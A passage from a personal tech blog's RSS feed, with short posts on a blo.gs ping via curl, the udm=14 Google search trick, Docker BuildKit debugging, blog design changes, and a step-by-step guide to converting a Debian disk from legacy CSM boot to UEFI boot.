  232.    <description><![CDATA[<p>While browsing posts from the past on the <a href="https://blog.x-way.org/on-this-day.html" title="x-log - On this day">On this day</a> page, I saw the one about <a href="http://blo.gs/" title="blo.gs">blog.gs</a> from <a href="https://blog.x-way.org/Coding/2002/06/12/blogs-Ping.html" title="x-log - blo.gs-Ping">2002</a>.</p>
  233. <p>Turns out the blog.gs ping mechanism is still working in exactly the same way after all these years (nowadays operated by Automattic).</p>
  234. <p>As I don't run my blog with PHP anymore, I added the following step at the end of my deploy script.<br>It uses <code>curl</code> to peform <a href="http://blo.gs/ping-example.php" title="blo.gs: weblogUpdates.extendedPing example">the XML-RPC call</a> of the <code>weblogUpdates.extendedPing</code> API with the parameters for my weblog.</p>
  235. <pre>curl -X POST -v ping.blo.gs -H 'content-type: text/xml' --data '&lt;?xml version="1.0"?&gt;&lt;methodCall&gt;&lt;methodName&gt;weblogUpdates.extendedPing&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;x-log&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;https://blog.x-way.org/&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;https://blog.x-way.org/rss.xml&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;'</pre>
  236. ]]></description>
  237.    <content:encoded><![CDATA[<p>While browsing posts from the past on the <a href="https://blog.x-way.org/on-this-day.html" title="x-log - On this day">On this day</a> page, I saw the one about <a href="http://blo.gs/" title="blo.gs">blog.gs</a> from <a href="https://blog.x-way.org/Coding/2002/06/12/blogs-Ping.html" title="x-log - blo.gs-Ping">2002</a>.</p>
  238. <p>Turns out the blog.gs ping mechanism is still working in exactly the same way after all these years (nowadays operated by Automattic).</p>
  239. <p>As I don't run my blog with PHP anymore, I added the following step at the end of my deploy script.<br>It uses <code>curl</code> to peform <a href="http://blo.gs/ping-example.php" title="blo.gs: weblogUpdates.extendedPing example">the XML-RPC call</a> of the <code>weblogUpdates.extendedPing</code> API with the parameters for my weblog.</p>
  240. <pre>curl -X POST -v ping.blo.gs -H 'content-type: text/xml' --data '&lt;?xml version="1.0"?&gt;&lt;methodCall&gt;&lt;methodName&gt;weblogUpdates.extendedPing&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;x-log&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;https://blog.x-way.org/&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;https://blog.x-way.org/rss.xml&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;'</pre>
  241. ]]></content:encoded>
  242.  </item>
  243.  
  244.  <item>
  245.    <title>Run Your Own Mail Server</title>
  246.    <link>https://blog.x-way.org/Linux/2024/05/31/Run-Your-Own-Mail-Server.html</link>
  247.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324363</guid>
  248.    <dc:creator>Andreas Jaggi</dc:creator>
  249.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  250.    <pubDate>Fri, 31 May 2024 20:24:00 +0000</pubDate>
  251.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  252.    <description><![CDATA[<p><a href="https://mwl.io/" title="About Me - Michael W Lucas">Michael W Lucas</a> is running a <a href="https://www.kickstarter.com/projects/mwlucas/run-your-own-mail-server/" title="Run Your Own Mail Server: A Book for Independence &amp; Privacy">Kickstarter campaign</a> to fund writing of book providing the knowledge to run your own mail server.</p>
  253. <p>As I'm running my own mail server (coincidently with some of the tools that will be discussed in the book: Debian, Postfix, Dovecot), I do sympathize with this initiative and would recommend to support the campaign.</p>
  254. ]]></description>
  255.    <content:encoded><![CDATA[<p><a href="https://mwl.io/" title="About Me - Michael W Lucas">Michael W Lucas</a> is running a <a href="https://www.kickstarter.com/projects/mwlucas/run-your-own-mail-server/" title="Run Your Own Mail Server: A Book for Independence &amp; Privacy">Kickstarter campaign</a> to fund writing of book providing the knowledge to run your own mail server.</p>
  256. <p>As I'm running my own mail server (coincidently with some of the tools that will be discussed in the book: Debian, Postfix, Dovecot), I do sympathize with this initiative and would recommend to support the campaign.</p>
  257. ]]></content:encoded>
  258.  </item>
  259.  
  260.  <item>
  261.    <title>udm=14</title>
  262.    <link>https://blog.x-way.org/Misc/2024/05/25/udm-14.html</link>
  263.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324362</guid>
  264.    <dc:creator>Andreas Jaggi</dc:creator>
  265.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  266.    <pubDate>Sat, 25 May 2024 09:30:00 +0000</pubDate>
  267.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  268.    <description><![CDATA[<p>As seen <a href="https://vowe.net/2024/05/20/old-school-google/" title="Old School Google - vowe dot net">all</a> <a href="https://daringfireball.net/linked/2024/05/22/google-web-tedium" title="Daring Fireball: How to Make Google’s 'Web' View Your Search Default">over</a> <a href="https://kottke.org/24/05/0044646-how-to-get-google-search" title="How to get Google search results without the AI garbage">the</a> <a href="https://bookmark.kniebes.io/bookmark/128c284f18cd11efadf1408d5c84b5d9" title="&amp;udm=14 | the disenshittification Konami code">place</a>, adding <code>udm=14</code> to the URL of a Google search makes the result display less crappy (no ads, no AI suggestions to <a href="https://www.bbc.com/news/articles/cd11gzejgz4o" title="Google AI search tells users to glue pizza and eat rocks">eat rocks or put glue on pizza</a>, &hellip;).<br>The search results themselves of course are not really getting better with this, but at least the search experience is less annoying.</p>
  269. <p>For the Desktop edition of Firefox you will need to use the <a href="https://addons.mozilla.org/en-US/firefox/addon/udm14/" title="udm14 - Get this Extension for Firefox">udm14 extension</a> to add the <code>udm=14</code> parameter by default to your search bar.<br>For other browsers it should be enough to modify the settings of the search URL used and add the parameter (something like <code>https://www.google.com/search?q=%s&amp;udm=14</code>).<br>Or even better, do use an alternative search engine :-)</p>
  270. ]]></description>
  271.    <content:encoded><![CDATA[<p>As seen <a href="https://vowe.net/2024/05/20/old-school-google/" title="Old School Google - vowe dot net">all</a> <a href="https://daringfireball.net/linked/2024/05/22/google-web-tedium" title="Daring Fireball: How to Make Google’s 'Web' View Your Search Default">over</a> <a href="https://kottke.org/24/05/0044646-how-to-get-google-search" title="How to get Google search results without the AI garbage">the</a> <a href="https://bookmark.kniebes.io/bookmark/128c284f18cd11efadf1408d5c84b5d9" title="&amp;udm=14 | the disenshittification Konami code">place</a>, adding <code>udm=14</code> to the URL of a Google search makes the result display less crappy (no ads, no AI suggestions to <a href="https://www.bbc.com/news/articles/cd11gzejgz4o" title="Google AI search tells users to glue pizza and eat rocks">eat rocks or put glue on pizza</a>, &hellip;).<br>The search results themselves of course are not really getting better with this, but at least the search experience is less annoying.</p>
  272. <p>For the Desktop edition of Firefox you will need to use the <a href="https://addons.mozilla.org/en-US/firefox/addon/udm14/" title="udm14 - Get this Extension for Firefox">udm14 extension</a> to add the <code>udm=14</code> parameter by default to your search bar.<br>For other browsers it should be enough to modify the settings of the search URL used and add the parameter (something like <code>https://www.google.com/search?q=%s&amp;udm=14</code>).<br>Or even better, do use an alternative search engine :-)</p>
  273. ]]></content:encoded>
  274.  </item>
  275.  
  276.  <item>
  277.    <title>Recent Docker BuildKit Features</title>
  278.    <link>https://blog.x-way.org/Linux/2024/05/20/Recent-Docker-BuildKit-Features.html</link>
  279.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324361</guid>
  280.    <dc:creator>Andreas Jaggi</dc:creator>
  281.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  282.    <pubDate>Mon, 20 May 2024 07:24:00 +0000</pubDate>
  283.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  284.    <description><![CDATA[<p>In the <a href="https://martinheinz.dev/blog/111" title="Recent Docker BuildKit Features You're Missing Out On | Martin Heinz | Personal Website &amp; Blog">Recent Docker BuildKit Features You're Missing Out On</a> article, <a href="https://martinheinz.dev/" title="Martin Heinz | Personal Website &amp; Blog">Martin Heinz</a> lists some of the new features that have been added to Docker with the BuildKit introduction.</p>
  285. <p>My favorite one is the <a href="https://github.com/docker/buildx/blob/master/docs/debugging.md" title="debugging docs">debugger for failed build steps</a> of a container:</p>
  286. <pre>export BUILDX_EXPERIMENTAL=1
  287. docker buildx debug --invoke /bin/sh --on=error build .</pre>
  288. ]]></description>
  289.    <content:encoded><![CDATA[<p>In the <a href="https://martinheinz.dev/blog/111" title="Recent Docker BuildKit Features You're Missing Out On | Martin Heinz | Personal Website &amp; Blog">Recent Docker BuildKit Features You're Missing Out On</a> article, <a href="https://martinheinz.dev/" title="Martin Heinz | Personal Website &amp; Blog">Martin Heinz</a> lists some of the new features that have been added to Docker with the BuildKit introduction.</p>
  290. <p>My favorite one is the <a href="https://github.com/docker/buildx/blob/master/docs/debugging.md" title="debugging docs">debugger for failed build steps</a> of a container:</p>
  291. <pre>export BUILDX_EXPERIMENTAL=1
  292. docker buildx debug --invoke /bin/sh --on=error build .</pre>
  293. ]]></content:encoded>
  294.  </item>
  295.  
  296.  <item>
  297.    <title>Migrations</title>
  298.    <link>https://blog.x-way.org/Coding/2024/05/20/Migrations.html</link>
  299.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324360</guid>
  300.    <dc:creator>Andreas Jaggi</dc:creator>
  301.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  302.    <pubDate>Mon, 20 May 2024 06:02:00 +0000</pubDate>
  303.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  304.    <description><![CDATA[<blockquote cite="https://twitter.com/mipsytipsy/status/1778534529298489428">
  305. <p>Migrations are not something you can do rarely, or put off, or avoid; not if you are a growing company. Migrations are an ordinary fact of life.</p>
  306. <p>Doing them swiftly, efficiently, and -- most of all -- *completely* is one of the most critical skills you can develop as a team.</p>
  307. </blockquote>
  308. <p>&mdash; <a href="https://charity.wtf/" title="Charity Majors">Charity Majors</a> (<a href="https://simonwillison.net/2024/May/6/charity-majors/" title="A quote from Charity Majors">via</a>)</p>
  309. ]]></description>
  310.    <content:encoded><![CDATA[<blockquote cite="https://twitter.com/mipsytipsy/status/1778534529298489428">
  311. <p>Migrations are not something you can do rarely, or put off, or avoid; not if you are a growing company. Migrations are an ordinary fact of life.</p>
  312. <p>Doing them swiftly, efficiently, and -- most of all -- *completely* is one of the most critical skills you can develop as a team.</p>
  313. </blockquote>
  314. <p>&mdash; <a href="https://charity.wtf/" title="Charity Majors">Charity Majors</a> (<a href="https://simonwillison.net/2024/May/6/charity-majors/" title="A quote from Charity Majors">via</a>)</p>
  315. ]]></content:encoded>
  316.  </item>
  317.  
  318.  <item>
  319.    <title>Building a Geocities website in 1998</title>
  320.    <link>https://blog.x-way.org/Misc/2024/05/19/Building-a-Geocities-website-in-1998.html</link>
  321.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324359</guid>
  322.    <dc:creator>Andreas Jaggi</dc:creator>
  323.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  324.    <pubDate>Sun, 19 May 2024 11:35:00 +0000</pubDate>
  325.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  326.    <description><![CDATA[<p><a href="https://youtu.be/HeXVKrtecis" title="Building a Geocities website in 1998 - YouTube">Building a Geocities website in 1998</a></p>
  327. <p>Brings back some faint memories of young me playing around with FrontPage (wondering why the preview rendering of an animated fullscreen background of a burning fire is making the computer go slow&hellip;)</p>
  328. <p>(<a href="https://buttondown.email/cassidoo/archive/an-honest-man-is-always-a-child-socrates/" title="Web links of the week - cassidoo">via</a>)</p>
  329. ]]></description>
  330.    <content:encoded><![CDATA[<p><a href="https://youtu.be/HeXVKrtecis" title="Building a Geocities website in 1998 - YouTube">Building a Geocities website in 1998</a></p>
  331. <p>Brings back some faint memories of young me playing around with FrontPage (wondering why the preview rendering of an animated fullscreen background of a burning fire is making the computer go slow&hellip;)</p>
  332. <p>(<a href="https://buttondown.email/cassidoo/archive/an-honest-man-is-always-a-child-socrates/" title="Web links of the week - cassidoo">via</a>)</p>
  333. ]]></content:encoded>
  334.  </item>
  335.  
  336.  <item>
  337.    <title>On this day</title>
  338.    <link>https://blog.x-way.org/Misc/2024/05/13/On-this-day.html</link>
  339.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324358</guid>
  340.    <dc:creator>Andreas Jaggi</dc:creator>
  341.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  342.    <pubDate>Mon, 13 May 2024 07:00:00 +0000</pubDate>
  343.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  344.    <description><![CDATA[<p>In his <a href="https://shkspr.mobi/blog/2024/05/it-was-twenty-years-ago-today/" title="It was twenty years ago today &mdash; Terence Eden's Blog">20 year anniversary post</a>, <a href="https://shkspr.mobi/blog/" title="Terence Eden's Blog">Terence Eden</a> explains how he uses the "<a href="https://shkspr.mobi/blog/on-this-day/" title="On This Day &mdash; Terence Eden's Blog">On This Day</a>" feature of his blog every morning to look back on what he was writing on this day in previous years.</p>
  345. <p>Finding this very inspiring, I decided to add a similar feature to my blog.<br>As my blog is built with Jekyll as static pages, some plain old JavaScript was needed to surface the posts of this day without having to rebuild the page daily.</p>
  346. <p>And here we have now the <a href="https://blog.x-way.org/on-this-day.html" title="x-log - On This day">On this day</a> page :-)</p>
  347. ]]></description>
  348.    <content:encoded><![CDATA[<p>In his <a href="https://shkspr.mobi/blog/2024/05/it-was-twenty-years-ago-today/" title="It was twenty years ago today &mdash; Terence Eden's Blog">20 year anniversary post</a>, <a href="https://shkspr.mobi/blog/" title="Terence Eden's Blog">Terence Eden</a> explains how he uses the "<a href="https://shkspr.mobi/blog/on-this-day/" title="On This Day &mdash; Terence Eden's Blog">On This Day</a>" feature of his blog every morning to look back on what he was writing on this day in previous years.</p>
  349. <p>Finding this very inspiring, I decided to add a similar feature to my blog.<br>As my blog is built with Jekyll as static pages, some plain old JavaScript was needed to surface the posts of this day without having to rebuild the page daily.</p>
  350. <p>And here we have now the <a href="https://blog.x-way.org/on-this-day.html" title="x-log - On This day">On this day</a> page :-)</p>
  351. ]]></content:encoded>
  352.  </item>
  353.  
  354.  <item>
  355.    <title>Warm weather warm colors</title>
  356.    <link>https://blog.x-way.org/Webdesign/2024/05/11/Warm-weather-warm-colors.html</link>
  357.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324357</guid>
  358.    <dc:creator>Andreas Jaggi</dc:creator>
  359.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  360.    <pubDate>Sat, 11 May 2024 20:03:00 +0000</pubDate>
  361.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  362.    <description><![CDATA[<p>The warm temperatures around here made me change the blog theme back to the warm colors ☀️</p>
  363. <p>Basically it's a revert of the <a href="https://blog.x-way.org/Webdesign/2024/01/01/Winter-plain-2.html" title="x-log - Winter - plain 2">winter layout changes</a> from beginning of the year, while keeping <a href="https://blog.x-way.org/Webdesign/2024/01/03/Valid-HTML5.html" title="x-log - Valid HTML5">all</a> <a href="https://blog.x-way.org/Webdesign/2024/01/27/Quick-and-dirty-dark-mode.html" title="x-log - Quick and dirty dark mode">the</a> <a href="https://blog.x-way.org/Webdesign/2024/01/28/Tables-are-gone.html" title="x-log - Tables are gone">HTML modernizations</a> done afterwards :-)</p>
  364. <p>We're back on the <a href="https://blog.x-way.org/Webdesign/2022/06/04/Blogging-like-2002.html" title="x-log - Blogging like 2002">original 2002 layout</a> (with modern HTML), for those trying to keep score. Enjoy!</p>
  365. ]]></description>
  366.    <content:encoded><![CDATA[<p>The warm temperatures around here made me change the blog theme back to the warm colors ☀️</p>
  367. <p>Basically it's a revert of the <a href="https://blog.x-way.org/Webdesign/2024/01/01/Winter-plain-2.html" title="x-log - Winter - plain 2">winter layout changes</a> from beginning of the year, while keeping <a href="https://blog.x-way.org/Webdesign/2024/01/03/Valid-HTML5.html" title="x-log - Valid HTML5">all</a> <a href="https://blog.x-way.org/Webdesign/2024/01/27/Quick-and-dirty-dark-mode.html" title="x-log - Quick and dirty dark mode">the</a> <a href="https://blog.x-way.org/Webdesign/2024/01/28/Tables-are-gone.html" title="x-log - Tables are gone">HTML modernizations</a> done afterwards :-)</p>
  368. <p>We're back on the <a href="https://blog.x-way.org/Webdesign/2022/06/04/Blogging-like-2002.html" title="x-log - Blogging like 2002">original 2002 layout</a> (with modern HTML), for those trying to keep score. Enjoy!</p>
  369. ]]></content:encoded>
  370.  </item>
  371.  
  372.  <item>
  373.    <title>The KonCodie Method</title>
  374.    <link>https://blog.x-way.org/Coding/2024/05/11/The-KonCodie-Method.html</link>
  375.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324356</guid>
  376.    <dc:creator>Andreas Jaggi</dc:creator>
  377.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  378.    <pubDate>Sat, 11 May 2024 17:09:00 +0000</pubDate>
  379.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  380.    <description><![CDATA[<p>What if <a href="https://konmari.com/" title="KonMarie | The Official Website of Marie Kondo">Marie Kondo</a> would become a software engineer?</p>
  381. <p><a href="https://www.200ok.com.au/" title="200 OK">Ben Buchanan</a> did run a parody account on this topic and has archived the posts <a href="https://weblog.200ok.com.au/2023/07/the-koncodie-method.html" title="The KonCodie Method | the 200ok weblog">on his site</a>.</p>
  382. <p>There are some gems :-)</p>
  383. <blockquote cite="https://weblog.200ok.com.au/2023/07/the-koncodie-method.html#koncodie-02"><p>To choose what to keep and what to throw away, take each dependency in one's manifest and ask: "Does this spark joy?" If it does, keep it. If not, remove it from your codebase.</p></blockquote>
  384. <blockquote cite="https://weblog.200ok.com.au/2023/07/the-koncodie-method.html#koncodie-08"><p>We should be choosing what to <code>.gitkeep</code>, not what we want to <code>.gitignore</code></p></blockquote>
  385. <blockquote cite="https://weblog.200ok.com.au/2023/07/the-koncodie-method.html#koncodie-31"><p>Cruft has only two possible causes: too much effort is required to refactor or it is unclear where things belong.</p></blockquote>
  386. ]]></description>
  387.    <content:encoded><![CDATA[<p>What if <a href="https://konmari.com/" title="KonMarie | The Official Website of Marie Kondo">Marie Kondo</a> would become a software engineer?</p>
  388. <p><a href="https://www.200ok.com.au/" title="200 OK">Ben Buchanan</a> did run a parody account on this topic and has archived the posts <a href="https://weblog.200ok.com.au/2023/07/the-koncodie-method.html" title="The KonCodie Method | the 200ok weblog">on his site</a>.</p>
  389. <p>There are some gems :-)</p>
  390. <blockquote cite="https://weblog.200ok.com.au/2023/07/the-koncodie-method.html#koncodie-02"><p>To choose what to keep and what to throw away, take each dependency in one's manifest and ask: "Does this spark joy?" If it does, keep it. If not, remove it from your codebase.</p></blockquote>
  391. <blockquote cite="https://weblog.200ok.com.au/2023/07/the-koncodie-method.html#koncodie-08"><p>We should be choosing what to <code>.gitkeep</code>, not what we want to <code>.gitignore</code></p></blockquote>
  392. <blockquote cite="https://weblog.200ok.com.au/2023/07/the-koncodie-method.html#koncodie-31"><p>Cruft has only two possible causes: too much effort is required to refactor or it is unclear where things belong.</p></blockquote>
  393. ]]></content:encoded>
  394.  </item>
  395.  
  396.  <item>
  397.    <title>If you don't fit...</title>
  398.    <link>https://blog.x-way.org/Misc/2024/05/05/If-you-dont-fit.html</link>
  399.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324354</guid>
  400.    <dc:creator>Andreas Jaggi</dc:creator>
  401.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  402.    <pubDate>Sun, 05 May 2024 20:40:00 +0000</pubDate>
  403.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  404.    <description><![CDATA[<p><a href="https://blog.x-way.org/images/if-you-dont-fit.png" title="A sad little puzzle piece is looking at a puzzle with no room for him. The text says &quot;If you don't fit... Maybe you haven't found the right puzzle.&quot; Then the piece joins a puzzle that is full of friendly pieces with lots of room"><img src="https://blog.x-way.org/images/if-you-dont-fit_thumb.png" height="500" width="400" alt="A sad little puzzle piece is looking at a puzzle with no room for him. The text says &quot;If you don't fit... Maybe you haven't found the right puzzle.&quot; Then the piece joins a puzzle that is full of friendly pieces with lots of room"></a></p>
  405. <p>&quot;If you don't fit... Maybe you haven't found the right puzzle.&quot; &mdash; <a href="https://admiralwonderboat.com/" title="ADMIRAL WONDERBOAT">Admiral</a> <a href="https://mastodon.social/@admiralwonderboat/112368789681867074" title="ADMIRAL WONDERBOAT">Wonderboat</a> (<a href="https://fosstodon.org/@sushee" title="Su-Shee">via</a>)</p>
  406. ]]></description>
  407.    <content:encoded><![CDATA[<p><a href="https://blog.x-way.org/images/if-you-dont-fit.png" title="A sad little puzzle piece is looking at a puzzle with no room for him. The text says &quot;If you don't fit... Maybe you haven't found the right puzzle.&quot; Then the piece joins a puzzle that is full of friendly pieces with lots of room"><img src="https://blog.x-way.org/images/if-you-dont-fit_thumb.png" height="500" width="400" alt="A sad little puzzle piece is looking at a puzzle with no room for him. The text says &quot;If you don't fit... Maybe you haven't found the right puzzle.&quot; Then the piece joins a puzzle that is full of friendly pieces with lots of room"></a></p>
  408. <p>&quot;If you don't fit... Maybe you haven't found the right puzzle.&quot; &mdash; <a href="https://admiralwonderboat.com/" title="ADMIRAL WONDERBOAT">Admiral</a> <a href="https://mastodon.social/@admiralwonderboat/112368789681867074" title="ADMIRAL WONDERBOAT">Wonderboat</a> (<a href="https://fosstodon.org/@sushee" title="Su-Shee">via</a>)</p>
  409. ]]></content:encoded>
  410.  </item>
  411.  
  412.  <item>
  413.    <title>Migrate from legacy CSM boot to UEFI boot</title>
  414.    <link>https://blog.x-way.org/Linux/2024/05/05/Migrate-from-legacy-CSM-boot-to-UEFI-boot.html</link>
  415.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324355</guid>
  416.    <dc:creator>Andreas Jaggi</dc:creator>
  417.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  418.    <pubDate>Sun, 05 May 2024 16:00:00 +0000</pubDate>
  419.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  420.    <description><![CDATA[<p>Due to a hardware failure I had to replace one of my computers (switching from a <a href="https://www.galaxus.ch/de/s1/product/intel-nuc-swift-canyon-nuc6i5syh-intel-core-i5-6260u-barebone-5670885" title="Intel NUC SWIFT CANYON NUC6I5SYH">2015 Intel NUC</a> to a <a href="https://www.galaxus.ch/de/s1/product/dell-optiplex-mff-intel-core-i5-12500t-16-gb-512-gb-ssd-pc-40390750" title="Dell OptiPlex MFF">Dell OptiPlex Micro 7010</a>).<br>
  421. After moving the disk to the new system, it refused to boot (claimed that no bootable drive was available).</p>
  422. <p>Turns out that the new system only supports UEFI booting and the existing disk was setup for 'legacy'/CSM boot.</p>
  423. <p>I used the following steps to convert the existing disk to UEFI boot (while keeping all data on it available).<br>They are inspired by the excellent <a href="http://blog.getreu.net/projects/legacy-to-uefi-boot/" title="Switch Debian from legacy to UEFI boot mode">Switch Debian from legacy to UEFI boot mode</a> guide from <a href="https://blog.getreu.net/" title="Jens Getreu">Jens Getreu</a>.</p>
  424. <ol>
  425. <li>Disable secure boot in the BIOS to allow booting from an USB stick.</li>
  426. <li>Create a bootable USB stick with a Debian live system (see <a href="https://blog.x-way.org/Linux/2024/05/05/Create-a-bootable-Debian-USB-stick-on-macOS.html" title="Create a bootable Debian USB stick on macOS">my previous post</a>)</li>
  427. <li>Boot into the Debian live system</li>
  428. <li>Identify the disk to work on (<code>/dev/nvme0n1</code> in my case)</li>
  429. <li>Convert the partition table from MBR to GPT:
  430. <pre># gdisk /dev/nvme0n1
  431.  
  432. r       recovery and transformation options (experts only)
  433. f       load MBR and build fresh GPT from it
  434. w write table to disk and exit</pre></li>
  435. <li>Install gparted into the Debian live system:
  436. <pre># apt-get install gparted</pre></li>
  437. <li>Create an UEFI partition and a partition for Grub2:
  438. <pre># gparted /dev/nvme0n1</pre>
  439. Resize an existing partition to create space (does not need to be at the beginning of the disk, I used the swap partition).<br>
  440. Create a new 100MB partition for efi (named "Efi partition"), format it as <code>fat32</code> and flag it <code>bootable</code>.<br>
  441. Create a new 50MB partition for Grub2 (named "BIOS boot partition"), keep it unformatted.</li>
  442. <li>Use gdisk to set proper partition codes (<code>EF00</code> for the efi partition and <code>EF02</code> for the Grub2 partition):
  443. <pre># gdisk /dev/nvme0n1
  444.  
  445. p print the partition table
  446. t change a partition's type code
  447. t change a partition's type code
  448. w write table to disk and exit</pre></li>
  449. <li>Chroot into the on-disk root system:
  450. <pre># mount -t ext4 /dev/nvme0n1p1 /mnt
  451. # mkdir /mnt/boot/efi
  452. # mount /dev/nvme0n1p2 /mnt/boot/efi
  453. # mount --bind /sys /mnt/sys
  454. # mount --bind /proc /mnt/proc
  455. # mount --bind /dev /mnt/dev
  456. # mount --bind /dev/pts /mnt/dev/pts
  457. # cp /etc/resolv.conf /mnt/etc/resolv.conf
  458. # chroot /mnt</pre></li>
  459. <li>Update /etc/fstab:
  460. <pre># ls -lisa /dev/disk/by-uuid</pre>
  461. Identify the UUID of the EFI partition (usually in the format <code>XXXX-XXXX</code>) and add a corresponding line to <code>/etc/fstab</code>:
  462. <pre># echo "UUID=XXXX-XXXX /boot/efi vfat defaults 0 2" &gt;&gt; /etc/fstab</pre></li>
  463. <li>Install grub-efi and install Grub2 to the EFI partition:
  464. <pre># apt-get remove grub-pc
  465. # apt-get install grub-efi</pre>
  466. <pre># grub-install /dev/nvme0n1</pre></li>
  467. <li>Exit the chroot and reboot the system:
  468. <pre># exit
  469. # reboot</pre></li>
  470. <li>Select the Debian bootloader (<code>/EFI/debian/grubx64.efi</code>) in the UEFI BIOS and make it the default :-)</li>
  471. </ol>
  472. ]]></description>
  473.    <content:encoded><![CDATA[<p>Due to a hardware failure I had to replace one of my computers (switching from a <a href="https://www.galaxus.ch/de/s1/product/intel-nuc-swift-canyon-nuc6i5syh-intel-core-i5-6260u-barebone-5670885" title="Intel NUC SWIFT CANYON NUC6I5SYH">2015 Intel NUC</a> to a <a href="https://www.galaxus.ch/de/s1/product/dell-optiplex-mff-intel-core-i5-12500t-16-gb-512-gb-ssd-pc-40390750" title="Dell OptiPlex MFF">Dell OptiPlex Micro 7010</a>).<br>
  474. After moving the disk to the new system, it refused to boot (claimed that no bootable drive was available).</p>
  475. <p>Turns out that the new system only supports UEFI booting and the existing disk was setup for 'legacy'/CSM boot.</p>
  476. <p>I used the following steps to convert the existing disk to UEFI boot (while keeping all data on it available).<br>They are inspired by the excellent <a href="http://blog.getreu.net/projects/legacy-to-uefi-boot/" title="Switch Debian from legacy to UEFI boot mode">Switch Debian from legacy to UEFI boot mode</a> guide from <a href="https://blog.getreu.net/" title="Jens Getreu">Jens Getreu</a>.</p>
  477. <ol>
  478. <li>Disable secure boot in the BIOS to allow booting from an USB stick.</li>
  479. <li>Create a bootable USB stick with a Debian live system (see <a href="https://blog.x-way.org/Linux/2024/05/05/Create-a-bootable-Debian-USB-stick-on-macOS.html" title="Create a bootable Debian USB stick on macOS">my previous post</a>)</li>
  480. <li>Boot into the Debian live system</li>
  481. <li>Identify the disk to work on (<code>/dev/nvme0n1</code> in my case)</li>
  482. <li>Convert the partition table from MBR to GPT:
  483. <pre># gdisk /dev/nvme0n1
  484.  
  485. r       recovery and transformation options (experts only)
  486. f       load MBR and build fresh GPT from it
  487. w write table to disk and exit</pre></li>
  488. <li>Install gparted into the Debian live system:
  489. <pre># apt-get install gparted</pre></li>
  490. <li>Create an UEFI partition and a partition for Grub2:
  491. <pre># gparted /dev/nvme0n1</pre>
  492. Resize an existing partition to create space (does not need to be at the beginning of the disk, I used the swap partition).<br>
  493. Create a new 100MB partition for efi (named "Efi partition"), format it as <code>fat32</code> and flag it <code>bootable</code>.<br>
  494. Create a new 50MB partition for Grub2 (named "BIOS boot partition"), keep it unformatted.</li>
  495. <li>Use gdisk to set proper partition codes (<code>EF00</code> for the efi partition and <code>EF02</code> for the Grub2 partition):
  496. <pre># gdisk /dev/nvme0n1
  497.  
  498. p print the partition table
  499. t change a partition's type code
  500. t change a partition's type code
  501. w write table to disk and exit</pre></li>
  502. <li>Chroot into the on-disk root system:
  503. <pre># mount -t ext4 /dev/nvme0n1p1 /mnt
  504. # mkdir /mnt/boot/efi
  505. # mount /dev/nvme0n1p2 /mnt/boot/efi
  506. # mount --bind /sys /mnt/sys
  507. # mount --bind /proc /mnt/proc
  508. # mount --bind /dev /mnt/dev
  509. # mount --bind /dev/pts /mnt/dev/pts
  510. # cp /etc/resolv.conf /mnt/etc/resolv.conf
  511. # chroot /mnt</pre></li>
  512. <li>Update /etc/fstab:
  513. <pre># ls -lisa /dev/disk/by-uuid</pre>
  514. Identify the UUID of the EFI partition (usually in the format <code>XXXX-XXXX</code>) and add a corresponding line to <code>/etc/fstab</code>:
  515. <pre># echo "UUID=XXXX-XXXX /boot/efi vfat defaults 0 2" &gt;&gt; /etc/fstab</pre></li>
  516. <li>Install grub-efi and install Grub2 to the EFI partition:
  517. <pre># apt-get remove grub-pc
  518. # apt-get install grub-efi</pre>
  519. <pre># grub-install /dev/nvme0n1</pre></li>
  520. <li>Exit the chroot and reboot the system:
  521. <pre># exit
  522. # reboot</pre></li>
  523. <li>Select the Debian bootloader (<code>/EFI/debian/grubx64.efi</code>) in the UEFI BIOS and make it the default :-)</li>
  524. </ol>
